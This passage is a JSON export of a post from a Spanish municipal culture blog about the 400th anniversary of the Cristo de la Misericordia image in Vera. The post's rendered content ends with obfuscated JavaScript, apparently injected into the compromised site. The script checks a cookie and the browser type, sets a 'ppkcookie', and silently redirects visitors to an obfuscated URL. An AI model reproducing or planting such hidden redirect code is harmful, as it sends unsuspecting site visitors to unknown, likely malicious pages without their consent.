_0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Se celebra el 400\u00ba aniversario de la imagen del Cristo de la Misericordia de la Hermandad de san Juan Evangelista de Vera. 27-12-15 a 27-02-2016.<\/p>\n","protected":false},"author":7,"featured_media":1837,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[110,109],"tags":[129,128,130,77,131,269],"class_list":["post-1828","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-arte-artesania","category-historia","tag-cofradias","tag-hermandades","tag-jesus","tag-manuel-caparros-perales","tag-misericordia","tag-s-xviii"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/1828","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=1828"}],"version-history":[{"count":7,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/1828\/revisions"}],"predecessor-version":[{"id":1842,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/1828\/revisions\/1842"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/1837"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=1828"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=1828"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=1828"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}